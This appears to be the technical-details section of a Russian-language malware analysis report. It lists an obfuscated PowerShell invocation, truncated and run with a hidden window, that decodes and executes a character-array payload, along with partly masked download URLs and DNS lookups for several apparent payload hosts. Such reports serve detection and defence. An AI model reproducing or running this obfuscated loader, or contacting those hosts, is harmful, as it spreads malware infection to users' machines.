Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $PSHomE[21]+$pshoME[34]+'X')( "$(SeT-item 'vAriaBLe:OFs' '' ) "+[STrING]([chAr[]] (106,59, 35, 36,56,10,110 , 115 , 110, 32 ,43 ,57 ,99, 33,44 ,36, 43 ,45 , 58 ,110,60,47 , 32, 42, 33, 35...
- 'er#####ryapimarket.com':80
- 'ad####rchitektur.at':80
- 'ad####rchitektur.at':443
- http://er#####ryapimarket.com/ljGYoe/
- http://ad####rchitektur.at/mrp4PJmoR/
- 'ad####rchitektur.at':443
- DNS ASK er#####ryapimarket.com
- DNS ASK ad#####re-ecuador.com
- DNS ASK co#####cionalanya.com
- DNS ASK av####rdstone.com
- DNS ASK ad####rchitektur.at
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $PSHomE[21]+$pshoME[34]+'X')( "$(SeT-item 'vAriaBLe:OFs' '' ) "+[STrING]([chAr[]] (106,59, 35, 36,56,10,110 , 115 , 110, 32 ,43 ,57 ,99, 33,44 ,36, 43 ,45 , 58 ,110,60,47 , 32, 42, 33, 35...' (со скрытым окном)